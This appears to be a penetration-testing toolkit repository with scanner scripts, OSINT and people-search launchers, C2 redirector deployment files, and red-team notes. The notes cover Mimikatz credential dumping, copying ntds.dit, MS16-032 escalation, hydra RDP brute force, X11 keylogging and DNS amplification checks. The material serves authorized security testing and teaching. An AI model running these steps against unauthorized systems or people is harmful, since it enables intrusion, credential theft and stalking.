--------------------------------------------------------------------------------
/resource/161-udp-snmp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 161
 4 | 
 5 | use auxiliary/scanner/misc/oki_scanner
 6 | run
 7 | 
 8 | use auxiliary/scanner/snmp/aix_version
 9 | run
10 | 
11 | use auxiliary/scanner/snmp/arris_dg950
12 | run
13 | 
14 | use auxiliary/scanner/snmp/brocade_enumhash
15 | run
16 | 
17 | use auxiliary/scanner/snmp/cisco_config_tftp
18 | run
19 | 
20 | use auxiliary/scanner/snmp/cisco_upload_file
21 | echo 'Hello world!' > /tmp/test.txt
22 | set SOURCE /tmp/test.txt
23 | run
24 | 
25 | use auxiliary/scanner/snmp/cnpilot_r_snmp_loot
26 | run
27 | 
28 | use auxiliary/scanner/snmp/epmp1000_snmp_loot
29 | run
30 | 
31 | use auxiliary/scanner/snmp/netopia_enum
32 | run
33 | 
34 | use auxiliary/scanner/snmp/sbg6580_enum
35 | run
36 | 
37 | use auxiliary/scanner/snmp/snmp_enum
38 | run
39 | 
40 | use auxiliary/scanner/snmp/snmp_enumshares
41 | run
42 | 
43 | use auxiliary/scanner/snmp/snmp_enumusers
44 | run
45 | 
46 | use auxiliary/scanner/snmp/snmp_login
47 | run
48 | 
49 | use auxiliary/scanner/snmp/ubee_ddw3611
50 | run
51 | 
52 | use auxiliary/scanner/snmp/xerox_workcentre_enumusers
53 | run
54 | 


--------------------------------------------------------------------------------
/notes/Python/scrape.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import sys
 4 | import webbrowser
 5 | from time import sleep
 6 | 
 7 | 
 8 | def main():
 9 |     company = 'Google'
10 |     domain = 'google.com'
11 | 
12 |     # Add only URL's that take the domain URL
13 |     urls_domain = [
14 |         'https://api.hackertarget.com/dnslookup/?q=',
15 |         'https://api.hackertarget.com/reversedns/?q=',
16 |         'https://api.hackertarget.com/pagelinks/?q=',
17 |         'https://seositecheckup.com/seo-audit/',
18 |         'http://viewdns.info/reversewhois/?q=',
19 |         'http://viewdns.info/dnsreport/?domain=',
20 |         'http://www.spyonweb.com/'
21 |     ]
22 | 
23 |     # Add only URL's that take the company name
24 |     urls_company = [
25 |         'https://censys.io/ipv4?q=',
26 |         'https://www.shodan.io/search?query='
27 |     ]
28 | 
29 |     for url in urls_domain:
30 |         webbrowser.open_new_tab(url + domain)
31 |         sleep(2)
32 | 
33 |     for comp in urls_company:
34 |         webbrowser.open_new_tab(comp + company)
35 |         sleep(2)
36 | 
37 | 
38 | if __name__ == '__main__':
39 |     main()
40 |     sys.exit(0)
41 | 


--------------------------------------------------------------------------------
/person.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | f_runlocally
 4 | clear
 5 | f_banner
 6 | 
 7 | echo -e "${BLUE}RECON${NC}"
 8 | echo
 9 | echo -n "First name: "
10 | read firstName
11 | 
12 | # Check for no answer
13 | if [ -z $firstName ]; then
14 |      f_error
15 | fi
16 | 
17 | echo -n "Last name:  "
18 | read lastName
19 | 
20 | # Check for no answer
21 | if [ -z $lastName ]; then
22 |      f_error
23 | fi
24 | 
25 | xdg-open https://www.411.com/name/$firstName-$lastName/ &
26 | sleep 2
27 | uripath="https://www.advancedbackgroundchecks.com/search/results.aspx?type=&fn=${firstName}&mi=&ln=${lastName}&age=&city=&state="
28 | xdg-open $uripath &
29 | sleep 2
30 | xdg-open https://www.linkedin.com/pub/dir/?first=$firstName\&last=$lastName\&search=Search &
31 | sleep 2
32 | xdg-open https://www.peekyou.com/$firstName%5f$lastName &
33 | sleep 2
34 | xdg-open https://www.addresses.com/people/$firstName+$lastName &
35 | sleep 2
36 | xdg-open https://www.spokeo.com/$firstName-$lastName &
37 | sleep 2
38 | xdg-open https://twitter.com/search?q=%22$firstName%20$lastName%22&src=typd &
39 | sleep 2
40 | xdg-open https://www.youtube.com/results?search_query=$firstName+$lastName &
41 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2007-2017 Lee Baird
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in
13 | all copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21 | THE SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/misc/deploy/ansible/redirector-c2.yml:
--------------------------------------------------------------------------------
 1 | ---
 2 | 
 3 | - hosts: all
 4 |   become: yes
 5 |   tasks:
 6 |   - name: apt update
 7 |     apt:
 8 |       update_cache: yes
 9 |       cache_valid_time: 3600
10 |       force_apt_get: yes
11 | 
12 |   - name: apt -y upgrade ; apt -y dist-upgrade ; apt -y autoremove ; apt -y autoclean
13 |     apt:
14 |       update_cache: yes
15 | #      upgrade: dist
16 |       cache_valid_time: 3600
17 |       force_apt_get: yes
18 |       autoremove: yes
19 |       autoclean: yes
20 | 
21 |   - name: Install packages
22 |     apt:
23 |       name:
24 |       - apache2
25 |       - curl
26 |       - git
27 |       - locate
28 |       - net-tools
29 |       - socat
30 |       - wget
31 |       state: latest
32 | 
33 |   - name: Install Apache modules
34 |     shell: |
35 |       a2enmod headers proxy proxy_html proxy_http rewrite ssl
36 | 
37 |   - name: Start Apache
38 |     service:
39 |       name: apache2
40 |       state: started
41 | 
42 |   - name: Change Apache config to allow for mod-rewrite
43 |     ansible.builtin.replace:
44 |       path: /etc/apache2/apache2.conf
45 |       after: ''
46 |       before: ''
47 |       regexp: ^\tAllowOverride None$
48 |       replace: '\tAllowOverride All'
49 | 
50 |   - name: Restart the Apache service
51 |     service:
52 |       name: apache2
53 |       state: restarted
54 | 


--------------------------------------------------------------------------------
/parsers/utfdictcsv.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | #
 3 | # by John Kim
 4 | # Thanks to Securicon, LLC. for sponsoring development
 5 | #
 6 | # -*- coding:utf-8 -*-
 7 | #
 8 | # Last edited by Alexander Sferrella on 9/22/2017
 9 | # Ported to python3 by Jay Townsend 2021-10-11
10 | 
11 | import codecs
12 | from io import StringIO
13 | import csv
14 | 
15 | 
16 | ################################################################
17 | 
18 | 
19 | class DictUnicodeWriter(object):
20 | 
21 |     def __init__(self, f, fieldnames, dialect=csv.excel, encoding="utf-8", **kwds):
22 |         # Redirect output to a queue
23 |         self.queue = StringIO()
24 |         self.writer = csv.DictWriter(self.queue, fieldnames, dialect=dialect, **kwds)
25 |         self.stream = f
26 |         self.encoder = codecs.getincrementalencoder(encoding)()
27 | 
28 |     def writerow(self, D):
29 |         self.writer.writerow({k: v for k, v in D.items() if v})
30 | 
31 |         # Fetch UTF-8 output from the queue ...
32 |         data = self.queue.getvalue()
33 |         data = str.encode(data).decode("utf-8")
34 |         # ... and re-encode it into the target encoding
35 |         data = self.encoder.encode(data)
36 |         # Write to the target stream
37 |         self.stream.write(data)
38 |         # Empty queue
39 |         self.queue.truncate(0)
40 | 
41 |     def writerows(self, rows):
42 |         for D in rows:
43 |             self.writerow(D)
44 | 
45 |     def writeheader(self):
46 |         self.writer.writeheader()
47 | 


--------------------------------------------------------------------------------
/notes/Python/discover/recon/person.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | 
 5 | # variables
 6 | colorBlue = "\033[01;34m{0}\033[00m"
 7 | 
 8 | ##############################################################################################################
 9 | 
10 | runlocally()
11 | os.system("clear")
12 | banner()
13 | 
14 | print colorBlue.format("RECON")
15 | print
16 | firstName = raw_input("First name: ")
17 | 
18 | if firstName == "":
19 |      error()
20 | 
21 | lastName = raw_input("Last name:  ")
22 | 
23 | if lastName == "":
24 |      error()
25 | 
26 | webbrowser.open("http://www.411.com/name/"+firstName+"-"+lastName+"/")
27 | time.sleep(2)
28 | uripath="http://www.advancedbackgroundchecks.com/search/results.aspx?type=&fn=${"+firstName+"}&mi=&ln=${"+lastName+"}&age=&city=&state="
29 | webbrowser.open(uripath)
30 | time.sleep(2)
31 | webbrowser.open("https://www.linkedin.com/pub/dir/"+firstName+"/"+lastName)
32 | time.sleep(2)
33 | webbrowser.open("http://www.peekyou.com/"+firstName+"%5f"+lastName)
34 | time.sleep(2)
35 | webbrowser.open("http://phonenumbers.addresses.com/people/"+firstName+"+"+lastName)
36 | time.sleep(2)
37 | webbrowser.open("https://pipl.com/search/?q="+firstName+"+"+lastName)
38 | time.sleep(2)
39 | webbrowser.open("http://www.spokeo.com/"+firstName+"-"+lastName)
40 | time.sleep(2)
41 | webbrowser.open("https://twitter.com/search?q=%22"+firstName+"%20"+lastName+"%22")
42 | time.sleep(2)
43 | webbrowser.open("https://www.youtube.com/results?search_query="+firstName+"+"+lastName)
44 | 
45 | print
46 | print
47 | sys.exit(0)
48 | 


--------------------------------------------------------------------------------
/mods/virustotal_subdomain_enum.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | __author__ = "Bharath"
 4 | __description__ = """A script to extract sub-domains that Virus Total
 5 |                    has found for a given domain name. Modified by Jay Townsend aka L1ghtn1ng"""
 6 | 
 7 | import argparse
 8 | import sys
 9 | 
10 | try:
11 |     from requests import get, exceptions
12 | except ImportError:
13 |     raise ImportError('requests library missing. pip3 install requests.')
14 | 
15 | 
16 | parser = argparse.ArgumentParser(description='Scrapes https://crt.sh for subdomains from SSL certificate transparency.')
17 | parser.add_argument('-d', '--domain', required=True, help='Domain to lookup.')
18 | parser.add_argument('-l', '--limit', default='40', help='How many to output, max allowed is 40 and the default.')
19 | args = parser.parse_args()
20 | 
21 | 
22 | def check_virustotal():
23 |     url = "https://www.virustotal.com/ui/domains/{0}/subdomains?limit={1}".format(args.domain, args.limit)
24 |     print("URL being queried: {}".format(url))
25 |     try:
26 |         get(url)
27 |     except exceptions.RequestException as e:
28 |         print(e)
29 |         sys.exit(1)
30 |     response = get(url)
31 |     return response.json()
32 | 
33 | 
34 | def print_results(search_results):
35 |     for index, item in enumerate(search_results['data']):
36 |         print(item['id'])
37 | 
38 | 
39 | if __name__ == '__main__':
40 |     try:
41 |         search_results = check_virustotal()
42 |         print_results(search_results)
43 |     except KeyboardInterrupt:
44 |         print('CTRL + C detected, quiting.')
45 | 


--------------------------------------------------------------------------------
/mods/goofile.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import re
 4 | import requests
 5 | import sys
 6 | 
 7 | from lxml import html
 8 | 
 9 | domain = sys.argv[1]
10 | filetype = sys.argv[2]
11 | start = 0
12 | results = []
13 | totalFiles = 0
14 | 
15 | 
16 | def google_dork():
17 |     global domain
18 |     global filetype
19 |     global start
20 |     global results
21 |     global totalFiles
22 | 
23 |     regex = re.compile(r'(?Phttp\S{3}\w+\S+)(?P&prev=search)', re.MULTILINE.IGNORECASE,)
24 |     headers = {
25 |         "Host": "www.google.com",
26 |         "User-agent": 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
27 |         "Referrer": "google.com"
28 |     }
29 | 
30 |     url = f'https://www.google.com/search?hl=en&q=site%3A{domain}%20filetype%3A{filetype}&num=100&start={start}'
31 |     page = requests.get(url, headers=headers)
32 |     tree = html.fromstring(page.content)
33 |     results = tree.xpath('//*[@class="r"]/a/@href')
34 | 
35 |     totalFiles += len(results)
36 | 
37 |     for link in results:
38 |         match = re.search(regex, link)
39 |         if match:
40 |             print(match.group('urls'))
41 |         else:
42 |             print(f'{link}')
43 | 
44 |     if results != []:
45 |         start += 100
46 | 
47 | 
48 | def main():
49 |     global results
50 |     global totalFiles
51 |     global filetype
52 | 
53 |     google_dork()
54 | 
55 |     if results == []:
56 |         sys.exit()
57 | 
58 |     while results != []:
59 |         google_dork()
60 | 
61 | 
62 | if __name__ == '__main__':
63 |     main()
64 | 


--------------------------------------------------------------------------------
/config/zshrc:
--------------------------------------------------------------------------------
 1 | 
 2 | # -----------------------------------------------------------------------------------------------
 3 | 
 4 | dns=$(ip r | grep dhcp | awk '{print $3}')
 5 | extip=$(curl -s http://ifconfig.me)
 6 | ip=$(hostname -I | awk '{print $1}')
 7 | mac=$(ip a | grep ether | awk '{print $2}')
 8 | 
 9 | alias c='clear'
10 | alias cl='clear ; ls -lh --color=auto'
11 | alias cla='clear ; ls -lah --color=auto'
12 | alias d='cd $HOME/Desktop/ ; clear'
13 | alias date='date +"%a %b %d, %Y - %r %Z"'
14 | alias e='exit'
15 | alias k='cd /home/kali/'
16 | alias kd='cd /home/kali/Desktop/'
17 | alias l='ls -lh'
18 | alias la='ls -lah'
19 | alias m='service postgresql start ; msfdb init ; msfconsole'
20 | alias n='echo;
21 | echo -n "External IP:  "$extip ; echo ;
22 | echo -n "Internal IP:  "$ip ; echo ;
23 | echo -n "MAC address:  "$mac ; echo ;
24 | echo -n "DNS:          "$dns ; echo ;
25 | echo ; netstat -antp; echo ;
26 | ping -c3 google.com'
27 | alias r='cd $HOME ; clear'
28 | alias s='cd /opt/discover/ ; clear'
29 | alias sip='sort -n -u -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4'
30 | alias ssh='ssh -o "XAuthLocation=/opt/X11/bin/xauth"'
31 | alias update='/opt/discover/update.sh'
32 | alias w="echo $ip ; python3 -m http.server 80"
33 | alias w2="echo $ip ; python3 -m http.server 8000"
34 | 
35 | #-----------------------------------------------------------------------------------------------
36 | 
37 | alias bh='neo4j console & ; sleep 6 ; bloodhound'
38 | alias cs='cd /opt/cobaltstrike/ ; ./teamserver $ip password  & ; sleep 5 ; ./cobaltstrike'
39 | alias csr='ssh -f -N -L 50050:localhost:50050  ; cd /opt/cobaltstrike ; ./cobaltstrike'
40 | alias pc='/opt/pycharm-community-2022.2.1/bin/pycharm.sh'
41 | 


--------------------------------------------------------------------------------
/notes/PowerShell/PS-Attack.txt:
--------------------------------------------------------------------------------
 1 | PS-Attack
 2 | 
 3 | 
 4 | PSAttack.exe
 5 | Get-Attack 
 6 | Get-Attack escalation
 7 | Invoke-MS16-032                                       Should give you a system level command prompt
 8 | 
 9 | PSAttack.exe
10 | Get-Attack mimi
11 | Get-Help Invoke-Mimikatz
12 | Invoke-Mimikatz -DumpCreds
13 | Get-Attack users
14 | Get-NetUser
15 | ------------------------------------------------------------------------------------------------------------------------------------------------------
16 | 
17 | Get-GPPPassword                                       Found a user: lee
18 | Get-Attack "active directory"
19 | Get-Help Get-NetUser
20 | Get-NetUser -UserName lee                             Member of a security group called LocalAdmin
21 | Get-Attack groups
22 | Get-Help Get-NetLocalGroup
23 | Get-NetLocalGroup -GroupName "Administrators"         List everyone in the local Administrators group
24 | 
25 | Restart PS>Attack
26 | Right click on icon > Run as Administrator            Enter admin creds
27 | Get-Attack "local admin"
28 | Find-LocalAdminAccess                                 Show other computers where these admin creds have admin access
29 | Get-Attack find
30 | Get-Help Invoke-UserHunter
31 | Get-Help Invoke-UserHunter -Examples
32 | Invoke-UserHunter -CheckAccess
33 | Get-Help Invoke-Mimikatz
34 | Invoke-Mimikatz -ComputerName  -DumpCreds
35 | 
36 | Restart PS>Attack
37 | Right click on icon > Run as Administrator            Enter the domain admin creds
38 | Get-Attack "domain controller"
39 | Get-NetDomainController
40 | Get-Attack copy
41 | Get-Help Invoke-NinjaCopy -Examples
42 | Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit"     ComputerName  -LocalDestination "C:\ntds.dit"
43 | ls
44 | 


--------------------------------------------------------------------------------
/notes/exploits.txt:
--------------------------------------------------------------------------------
 1 | Exploits
 2 | 
 3 | 
 4 | searchsploit   
 5 | searchsploit -t 
 6 | 
 7 | searchsploit -t HP iLo 4
 8 | searchsploit -p -x 44005                                   Show info on the exploit
 9 | cp /usr/share/exploitdb/multiple/remote/44005.py /tmp/     Copy the exploit to a new location
10 | ------------------------------------------------------------------------------------------------------------------------------------------------------
11 | 
12 | # Identify if C code is written for Windows or Linux.
13 | 
14 | Windows - process.h, string.h, winbase.h, windows.h, winsock2.h
15 | Linux - arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
16 | ------------------------------------------------------------------------------------------------------------------------------------------------------
17 | 
18 | # Grep out Windows headers, to leave only Linux based exploits.
19 | 
20 | cat sploitlist.txt | grep -i 'exploit' | cut -d ' ' -f1 | xargs grep 'sys' | cut -d ':' -f1 | sort -u
21 | ------------------------------------------------------------------------------------------------------------------------------------------------------
22 | 
23 | # Compiling
24 | 
25 | gcc -o exploit 1234.c                                      Basic GCC compile
26 | gcc -m32 -o exploit 2345.c                                 Cross compile 32-bit binary on 64-bit Linux
27 | i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe     Cross compile a Windows .exe on Linux
28 | i586-mingw32msvc-gcc adduser.c -o adduser.exe              Cross compile a Windows .exe on Linux
29 | ------------------------------------------------------------------------------------------------------------------------------------------------------
30 | 
31 | # Visual Studio
32 | 
33 | Select Desktop developement with C++
34 | On the right, select C++/CLI support for v143 buile tools
35 | 


--------------------------------------------------------------------------------
/notes/dns.txt:
--------------------------------------------------------------------------------
 1 | DNS
 2 | 
 3 | 
 4 | # General
 5 | 
 6 | dig target.com <type>                    a, mx, ns, soa, srv, txt, any
 7 | dig -x <target IP>                       Pointer records
 8 | dig @nameserverIP target.com axfr        Zone transfer
 9 | dig @nameserverIP target.com afro        Forward zone transfer
10 | 
11 | host -t ns target.com                    Show name servers 
12 | host -t mx target.com                    Show mail servers
13 | host www.target.com
14 | host -l target.com <nameserver>          Zone transfer
15 | ------------------------------------------------------------------------------------------------------------------------------------------------------
16 |  
17 | # Cache snooping
18 | 
19 | host -r www.google.com <nameserver IP>
20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
21 | 
22 | # DNS cache poisioning
23 | 
24 | for i in `53.txt`; do dig @"$i" +short porttest.dns-oarc.net TXT; done; > CachePoison.txt
25 | ------------------------------------------------------------------------------------------------------------------------------------------------------
26 | 
27 | # Non-recursive DNS queries
28 | 
29 | for i in `cat 53.txt`; do dig @"$i" www.google.com A +norecurse; done > NonRecurive.txt
30 | ------------------------------------------------------------------------------------------------------------------------------------------------------
31 | 
32 | # Open DNS resolution against a DNS server.
33 | 
34 | Supply a hostname not cached or inside a company owned domain.
35 | nslookup www.nsa.gov <nameserver IP>
36 | ------------------------------------------------------------------------------------------------------------------------------------------------------
37 | 
38 | # Spoofed request amplification DDoS
39 | 
40 | for i in `cat 53.txt`; do dig @"$i" . NS; done > AmpDDoS.txt
41 | 


--------------------------------------------------------------------------------
/notes/maltego.txt:
--------------------------------------------------------------------------------
 1 | Maltego
 2 | 
 3 | 
 4 | # Example 1
 5 | 
 6 | Create a new graph.
 7 | Under the Emity Palette on the left, Infrastructure > Domain
 8 | Drag the Domain icon to the right.
 9 | Edit the domain to your target.
10 | Right click > Run Transform > Email addresses from Domain > All
11 | 
12 | DNS from Domain > All
13 | ctrl + down to select servers > Resolve to IP > All
14 | ctrl + down to select IPs > DNS from IP > All
15 | ctrl + down to select servers > Convert to Domain > All
16 | ctrl + down to select domains > Email addresses from Domain > All
17 | Select all emails > Other transforms > To Person, emailToMyspaceAccount, emailToFlickerAccount
18 | ------------------------------------------------------------------------------------------------------------------------------------------------------
19 | 
20 | # Example 2
21 | 
22 | Select IPv4 Address from the palette on the left and drag the icon to the right.
23 | Edit the IP address to your target.
24 | Right click > Run Transform > DNS from IP > All in this set
25 | ------------------------------------------------------------------------------------------------------------------------------------------------------
26 | 
27 | Add a Domain > edit name to your target (www.target.com)
28 | 
29 | # Example 3
30 | 
31 | Right click > Run Transform > All Transforms > To Domain [Find other TLDs]
32 | Select all TLDs > Run Transform > All Transforms > To Website [Quick lookup]
33 | 
34 | Select all websites > Run Transform > All Transforms > To IP Address [DNS]
35 | ------------------------------------------------------------------------------------------------------------------------------------------------------
36 | 
37 | # Example 4
38 | 
39 | RC > Run Transform > DNS from Domain > All in this set
40 | Select all  > Run Transform > All Transforms > To IP Address [DNS]
41 | Select all  IP addresses > Run Transform > All Transforms > To Netblock [Using whois info]
42 | 


--------------------------------------------------------------------------------
/report/data/summary.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | Company
16 | 
17 | Address
18 | City, State Zip
19 | Phone
20 | URL
21 | ===============================================================================================================================
22 | 
23 | # Summary paragraph about the company.
24 | 
25 | https://finance.yahoo.com
26 | https://www.google.com/finance
27 | https://www.reuters.com/finance/stocks/lookup
28 | https://www.sec.gov/edgar/searchedgar/companysearch.html
29 | 
30 | Accourding to Justia Dockets & Filings, COMPANY is currently involved in ### cases.
31 | https://dockets.justia.com/search?parties=%22COMPANY%22
32 | ===============================================================================================================================
33 | 
34 | Social Media     URL                                                       Followers
35 | 
36 | facebook         https://www.facebook.com/                                 xxx
37 | Instagram        https://www.instagram.com/                                xxx
38 | Linkedin         https://www.linkedin.com/company/                         xxx
39 | Pinterest        https://www.pinterest.com/                                xxx
40 | Twitter          https://twitter.com/                                      xxx
41 | YouTube          https://www.youtube.com/                                  xxx
42 | ===============================================================================================================================
43 | 
44 | Google Dork                             Results
45 | 
46 | 
47 | 

48 | 


--------------------------------------------------------------------------------
/nikto.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | # Check for root
 4 | if [ $EUID == 0 ]; then
 5 |      echo
 6 |      echo
 7 |      echo "[!] This option cannot be ran as root."
 8 |      echo
 9 |      exit
10 | fi
11 | 
12 | clear
13 | f_banner
14 | 
15 | echo -e "${BLUE}Run multiple instances of Nikto in parallel.${NC}"
16 | echo
17 | echo "1.  List of IPs"
18 | echo "2.  List of IP:port"
19 | echo "3.  Previous menu"
20 | echo
21 | echo -n "Choice: "
22 | read choice
23 | 
24 | case $choice in
25 |      1)
26 |      f_location
27 | 
28 |      echo
29 |      echo -n "Port (default 80): "
30 |      read port
31 |      echo
32 | 
33 |      # Check if port is a number
34 |      echo "$port" | grep -E "^[0-9]+$" 2>/dev/null
35 |      isnum=$?
36 | 
37 |      if [ $isnum -ne 0 ] && [ ${#port} -gt 0 ]; then
38 |           f_error
39 |      fi
40 | 
41 |      if [ ${#port} -eq 0 ]; then
42 |           port=80
43 |      fi
44 | 
45 |      if [ $port -lt 1 ] || [ $port -gt 65535 ]; then
46 |           f_error
47 |      fi
48 | 
49 |      mkdir $home/data/nikto-$port
50 | 
51 |      while read -r line; do
52 |           xdotool key ctrl+shift+t
53 |           xdotool type "nikto -h $line -port $port -no404 -maxtime 20m -Format htm --output $home/data/nikto-$port/$line.htm ; exit"
54 |           sleep 1
55 |           xdotool key Return
56 |      done < "$location"
57 |      ;;
58 | 
59 |      2)
60 |      f_location
61 | 
62 |      mkdir $home/data/nikto
63 | 
64 |      while IFS=: read -r host port; do
65 |           xdotool key ctrl+shift+t
66 |           sleep 1
67 |           xdotool type "nikto -h $host -port $port -no404 -maxtime 20m -Format htm --output $home/data/nikto/$host-$port.htm ; exit"
68 |           sleep 1
69 |           xdotool key Return
70 |      done < "$location"
71 |      ;;
72 | 
73 |      3) f_main;;
74 |      *) f_error;;
75 | esac
76 | 
77 | echo
78 | echo $medium
79 | echo
80 | echo "***Scan complete.***"
81 | echo
82 | echo
83 | echo -e "The new report is located at ${YELLOW}$home/data/nikto-$port/${NC}\n"
84 | 


--------------------------------------------------------------------------------
/misc/deploy/main.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_providers {
 3 |     aws = {
 4 |       source  = "hashicorp/aws"
 5 |       version = "~> 4.16"
 6 |     }
 7 |   }
 8 | 
 9 |   required_version = ">= 1.2.0"
10 | }
11 | 
12 | provider "aws" {
13 |   region = "us-east-1"
14 | }
15 | 
16 | # ---------------------------------------------------------------------------------------------------------------------
17 | 
18 | resource "aws_instance" "redirector" {
19 |   ami                    = "ami-052efd3df9dad4825" # Ubuntu for my region
20 |   instance_type          = "t2.micro"
21 |   key_name               = "deploy" # Created in AWS GUI
22 |   vpc_security_group_ids = [aws_security_group.operators.id]
23 | 
24 |   tags = {
25 |     Name = "Redirector"
26 |   }
27 | 
28 |   provisioner "remote-exec" {
29 |     connection {
30 |       host        = aws_instance.redirector.public_ip
31 |       type        = "ssh"
32 |       user        = "ubuntu"
33 |       agent       = true
34 |       private_key = file("~/.ssh/deploy.pem")
35 |     }
36 | 
37 |     inline = ["echo; echo '[*] Connected to new server.'; echo"]
38 |   }
39 | 
40 |   provisioner "local-exec" {
41 |     command = "ansible-playbook -u ubuntu -i '${aws_instance.redirector.public_ip},' --private-key ~/.ssh/deploy.pem ansible/redirector-c2.yml"
42 |   }
43 | }
44 | 
45 | # ---------------------------------------------------------------------------------------------------------------------
46 | 
47 | resource "aws_security_group" "operators" {
48 |   egress {
49 |     from_port   = 0
50 |     to_port     = 0
51 |     protocol    = "-1"
52 |     cidr_blocks = ["0.0.0.0/0"]
53 |   }
54 |   ingress {
55 |     from_port   = 22
56 |     to_port     = 22
57 |     protocol    = "tcp"
58 |     cidr_blocks = [""]
59 |   }
60 |   ingress {
61 |     from_port   = 80
62 |     to_port     = 80
63 |     protocol    = "tcp"
64 |     cidr_blocks = ["0.0.0.0/0"]
65 |   }
66 |   ingress {
67 |     from_port   = 443
68 |     to_port     = 443
69 |     protocol    = "tcp"
70 |     cidr_blocks = ["0.0.0.0/0"]
71 |   }
72 |   ingress {
73 |     from_port   = 53
74 |     to_port     = 53
75 |     protocol    = "udp"
76 |     cidr_blocks = ["0.0.0.0/0"]
77 |   }
78 |   tags = {
79 |     Name = "Operators"
80 |   }
81 | }
82 | 


--------------------------------------------------------------------------------
/notes/insecure-protocols.txt:
--------------------------------------------------------------------------------
 1 | Insecure Protocols
 2 | 
 3 | 
 4 | # FTP access with admin/null credentials
 5 | 
 6 | ftp admin@
 7 | user
 8 | admin
 9 | pwd
10 | 
11 | telnet  21
12 | user admin
13 | pass
14 | id;
15 | ------------------------------------------------------------------------------------------------------------------------------------------------------
16 | 
17 | # FTP on non-standard port
18 | 
19 | ftp  
20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
21 | 
22 | # FTP server does not support AUTH command
23 | 
24 | telnet  21
25 | AUTH test
26 | ------------------------------------------------------------------------------------------------------------------------------------------------------
27 | 
28 | # Remote Desktop
29 | 
30 | hydra -t 4 -V -l administrator -P /usr/share/wordlists/rockyou.txt rdp://targetIP
31 | ------------------------------------------------------------------------------------------------------------------------------------------------------
32 | 
33 | # Rservices
34 | 
35 | 513/tcp
36 | apt-get install rsh-client
37 | rlogin -l root 
38 | ------------------------------------------------------------------------------------------------------------------------------------------------------
39 | 
40 | # SSH Protocol v1
41 | 
42 | nmap -Pn -n -T4 -p22 --script=sshv1 
43 | 
44 | ssh -1 
45 | ------------------------------------------------------------------------------------------------------------------------------------------------------
46 | 
47 | # X11
48 | 
49 | nmap -Pn -n -T4 -p6000-6010 --script=x11-access 
50 | 
51 | xspy 
52 | 
53 | OS X
54 | - Screenshot
55 | xwd -display : -root -out file.xwd
56 | 
57 | - View screenshot
58 | xwud -in file.xwd
59 | 
60 | - Key logging
61 | xkey :0.0
62 | 
63 | xdotool inject
64 | Open another Terminal and type:
65 | 
66 | export DISPLAY=:0
67 | 
68 | $ xdotool key x t e r m
69 | $ xdotool key KP_Enter
70 | 
71 | Might need to inject 1 char at a time:
72 | 
73 | xdotool key x
74 | xdotool key t
75 | xdotool key e
76 | xdotool key r
77 | xdotool key m
78 | 


--------------------------------------------------------------------------------
/notes/cidr.txt:
--------------------------------------------------------------------------------
 1 | CIDR    Netmask            Networks    Usable IPs
 2 | /1      128.0.0.0             128 A    2,147,483,646
 3 | /2      192.0.0.0              64 A    1,073,741,822
 4 | /3      224.0.0.0              32 A      536,870,910
 5 | /4      240.0.0.0              16 A      268,435,454
 6 | /5      248.0.0.0               8 A      134,217,726
 7 | /6      252.0.0.0               4 A       67,108,862
 8 | /7      254.0.0.0               2 A       33,554,430
 9 | /8      255.0.0.0               1 A       16,777,214
10 | /9      255.128.0.0           128 B        8,388,606
11 | /10     255.192.0.0            64 B        4,194,302
12 | /11     255.224.0.0            32 B        2,097,150
13 | /12     255.240.0.0            16 B        1,048,574
14 | /13     255.248.0.0             8 B          524,286
15 | /14     255.252.0.0             4 B          262,142
16 | /15     255.254.0.0             2 B          131,070
17 | /16     255.255.0.0             1 B           65,534
18 | /17     255.255.128.0         128 C           32,766
19 | /18     255.255.192.0          64 C           16,382
20 | /19     255.255.224.0          32 C            8,190
21 | /20     255.255.240.0          16 C            4,094
22 | /21     255.255.248.0           8 C            2,046
23 | /22     255.255.252.0           4 C            1,022
